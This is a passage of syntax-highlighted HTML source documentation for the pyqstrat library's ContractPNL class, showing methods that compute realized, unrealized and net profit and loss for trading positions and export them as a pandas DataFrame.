class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_qtys</span> <span class=\"o\">=</span> <span class=\"n\">open_qtys</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">open_prices</span> <span class=\"o\">=</span> <span class=\"n\">open_prices</span>\n <span class=\"n\">position_chg</span> <span class=\"o\">=</span> <span class=\"nb\">sum</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">])</span>\n <span class=\"n\">commission_chg</span> <span class=\"o\">=</span> <span class=\"nb\">sum</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">commission</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">])</span>\n <span class=\"n\">fee_chg</span> <span class=\"o\">=</span> <span class=\"nb\">sum</span><span class=\"p\">([</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">fee</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">t_trades</span><span class=\"p\">])</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">[</span><span class=\"n\">timestamp</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">position_chg</span><span class=\"p\">,</span> <span class=\"n\">realized_chg</span><span class=\"p\">,</span> <span class=\"n\">fee_chg</span><span class=\"p\">,</span> <span class=\"n\">commission_chg</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">prev_timestamp</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">prev_position</span><span class=\"p\">,</span> <span class=\"n\">prev_realized</span><span class=\"p\">,</span> <span class=\"n\">prev_fee</span><span class=\"p\">,</span> <span class=\"n\">prev_commission</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">[</span><span class=\"n\">timestamp</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">prev_position</span> <span class=\"o\">+</span> <span class=\"n\">position_chg</span><span class=\"p\">,</span> <span class=\"n\">prev_realized</span> <span class=\"o\">+</span> <span class=\"n\">realized_chg</span><span class=\"p\">,</span>\n <span class=\"n\">prev_fee</span> <span class=\"o\">+</span> <span class=\"n\">fee_chg</span><span class=\"p\">,</span> <span class=\"n\">prev_commission</span> <span class=\"o\">+</span> <span class=\"n\">commission_chg</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">calc_net_pnl</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n \n<div class=\"viewcode-block\" id=\"ContractPNL.calc_net_pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.calc_net_pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">calc_net_pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"c1\"># If we already calculated unrealized pnl for this timestamp and no new trades were added no need to do anything</span>\n <span class=\"k\">if</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span> <span class=\"ow\">and</span> <span class=\"ow\">not</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">new_trades_added</span><span class=\"p\">:</span> <span class=\"k\">return</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span> <span class=\"ow\">or</span> <span class=\"n\">timestamp</span> <span class=\"o\">&lt;</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">first_trade_timestamp</span><span class=\"p\">:</span> <span class=\"k\">return</span>\n <span class=\"c1\"># TODO: Option expiry should be a special case. If option expires at 3:00 pm, we put in an expiry order at 3 pm and the</span>\n <span class=\"c1\"># trade comes in at 3:01 pm. In this case, the final pnl is recorded at 3:01 but should be at 3 pm.</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span class=\"kc\">None</span> <span class=\"ow\">and</span> <span class=\"n\">timestamp</span> <span class=\"o\">&gt;</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">and</span> <span class=\"ow\">not</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isnan</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span><span class=\"p\">):</span> <span class=\"k\">return</span>\n \n <span class=\"c1\"># make sure timestamp is in the sequence of timestamps we were given </span>\n <span class=\"n\">i</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">searchsorted</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">timestamp</span><span class=\"p\">,</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;timestamp </span><span class=\"si\">{</span><span class=\"n\">timestamp</span><span class=\"si\">}</span><span class=\"s1\"> not found&#39;</span><span class=\"p\">)</span>\n\n <span class=\"c1\"># Find most current trade PNL, i.e. with the index before or equal to current timestamp. If not found, set to 0&#39;s</span>\n <span class=\"n\">trade_pnl_index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">trade_pnl_index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">weighted_avg_price</span> <span class=\"o\">=</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">trade_pnl_index</span><span class=\"p\">)</span>\n\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nan</span>\n\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isclose</span><span class=\"p\">(</span><span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">):</span>\n <span class=\"n\">unrealized</span> <span class=\"o\">=</span> <span class=\"mf\">0.0</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">price</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_price_function</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span><span class=\"p\">,</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategy_context</span><span class=\"p\">)</span> <span class=\"c1\"># type: ignore</span>\n <span class=\"n\">assert_</span><span class=\"p\">(</span><span class=\"nb\">bool</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isreal</span><span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">)),</span>\n <span class=\"sa\">f</span><span class=\"s1\">&#39;Unexpected price type: </span><span class=\"si\">{</span><span class=\"n\">price</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"nb\">type</span><span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">)</span><span class=\"si\">}</span><span class=\"s1\"> for contract: </span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"si\">}</span><span class=\"s1\"> timestamp: </span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_account_timestamps</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isnan</span><span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">):</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span> <span class=\"c1\"># Most recent unrealized pnl</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">prev_unrealized</span><span class=\"p\">,</span> <span class=\"n\">prev_open_qty</span> <span class=\"o\">=</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">prev_open_qty</span><span class=\"p\">,</span> <span class=\"n\">prev_unrealized</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span>\n <span class=\"n\">unrealized</span> <span class=\"o\">=</span> <span class=\"n\">prev_unrealized</span> <span class=\"o\">+</span> <span class=\"p\">(</span><span class=\"n\">open_qty</span> <span class=\"o\">-</span> <span class=\"n\">prev_open_qty</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"p\">(</span><span class=\"n\">price</span> <span class=\"o\">-</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">unrealized</span> <span class=\"o\">=</span> <span class=\"n\">open_qty</span> <span class=\"o\">*</span> <span class=\"p\">(</span><span class=\"n\">price</span> <span class=\"o\">-</span> <span class=\"n\">weighted_avg_price</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span>\n \n <span class=\"n\">net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">realized</span> <span class=\"o\">+</span> <span class=\"n\">unrealized</span> <span class=\"o\">-</span> <span class=\"n\">commission</span> <span class=\"o\">-</span> <span class=\"n\">fee</span>\n\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"p\">[</span><span class=\"n\">timestamp</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">open_qty</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span class=\"kc\">None</span> <span class=\"ow\">and</span> <span class=\"n\">timestamp</span> <span class=\"o\">&gt;</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span><span class=\"p\">:</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span> <span class=\"o\">=</span> <span class=\"n\">net_pnl</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">new_trades_added</span> <span class=\"o\">=</span> <span class=\"kc\">False</span></div>\n \n<div class=\"viewcode-block\" id=\"ContractPNL.position\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.position\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">position</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">float</span><span class=\"p\">:</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span> <span class=\"k\">return</span> <span class=\"mf\">0.</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span> <span class=\"c1\"># Less than or equal to timestamp</span>\n <span class=\"k\">return</span> <span class=\"n\">position</span></div>\n \n<div class=\"viewcode-block\" id=\"ContractPNL.net_pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.net_pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">net_pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">float</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span class=\"kc\">None</span> <span class=\"ow\">and</span> <span class=\"n\">timestamp</span> <span class=\"o\">&gt;</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">expiry</span> <span class=\"ow\">and</span> <span class=\"ow\">not</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isnan</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span><span class=\"p\">):</span>\n <span class=\"k\">return</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">final_pnl</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span> <span class=\"k\">return</span> <span class=\"mf\">0.</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span> <span class=\"c1\"># Less than or equal to timestamp</span>\n <span class=\"k\">return</span> <span class=\"n\">net_pnl</span></div>\n \n<div class=\"viewcode-block\" id=\"ContractPNL.pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">]:</span>\n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span> <span class=\"o\">=</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mi\">0</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">!=</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"n\">_</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span> <span class=\"c1\"># Less than or equal to timestamp</span>\n \n <span class=\"n\">index</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">index</span> <span class=\"o\">!=</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">_</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">open_position</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span><span class=\"p\">)</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"o\">.</span><span class=\"n\">peekitem</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"p\">)</span> <span class=\"c1\"># Less than or equal to timestamp</span>\n <span class=\"k\">return</span> <span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span></div>\n \n<div class=\"viewcode-block\" id=\"ContractPNL.df\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.ContractPNL.df\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns a pandas dataframe with pnl data&#39;&#39;&#39;</span>\n <span class=\"n\">df_trade_pnl</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">([</span>\n <span class=\"p\">(</span><span class=\"n\">k</span><span class=\"p\">,</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">3</span><span class=\"p\">])</span> <span class=\"k\">for</span> <span class=\"n\">k</span><span class=\"p\">,</span> <span class=\"n\">v</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">items</span><span class=\"p\">()],</span>\n <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">df_net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">([</span>\n <span class=\"p\">(</span><span class=\"n\">k</span><span class=\"p\">,</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">],</span> <span class=\"n\">v</span><span class=\"p\">[</span><span class=\"mi\">3</span><span class=\"p\">])</span> <span class=\"k\">for</span> <span class=\"n\">k</span><span class=\"p\">,</span> <span class=\"n\">v</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_net_pnl</span><span class=\"o\">.</span><span class=\"n\">items</span><span class=\"p\">()],</span>\n <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;price&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">all_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">concatenate</span><span class=\"p\">((</span><span class=\"n\">df_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">df_net_pnl</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">)))</span>\n <span class=\"n\">df_trade_pnl</span> <span class=\"o\">=</span> <span class=\"n\">df_trade_pnl</span><span class=\"o\">.</span><span class=\"n\">set_index</span><span class=\"p\">(</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">reindex</span><span class=\"p\">(</span><span class=\"n\">all_timestamps</span><span class=\"p\">,</span> <span class=\"n\">method</span><span class=\"o\">=</span><span class=\"s1\">&#39;ffill&#39;</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">reset_index</span><span class=\"p\">()</span>\n <span class=\"n\">df_trade_pnl</span> <span class=\"o\">=</span> <span class=\"n\">leading_nan_to_zero</span><span class=\"p\">(</span><span class=\"n\">df_trade_pnl</span><span class=\"p\">,</span> <span class=\"p\">[</span><span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">df_net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">df_net_pnl</span><span class=\"o\">.</span><span class=\"n\">set_index</span><span class=\"p\">(</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">reindex</span><span class=\"p\">(</span><span class=\"n\">all_timestamps</span><span class=\"p\">,</span> <span class=\"n\">method</span><span class=\"o\">=</span><span class=\"s1\">&#39;ffill&#39;</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">reset_index</span><span class=\"p\">()</span>\n <span class=\"k\">del</span> <span class=\"n\">df_net_pnl</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">]</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">concat</span><span class=\"p\">([</span><span class=\"n\">df_trade_pnl</span><span class=\"p\">,</span> <span class=\"n\">df_net_pnl</span><span class=\"p\">],</span> <span class=\"n\">axis</span><span class=\"o\">=</span><span class=\"mi\">1</span><span 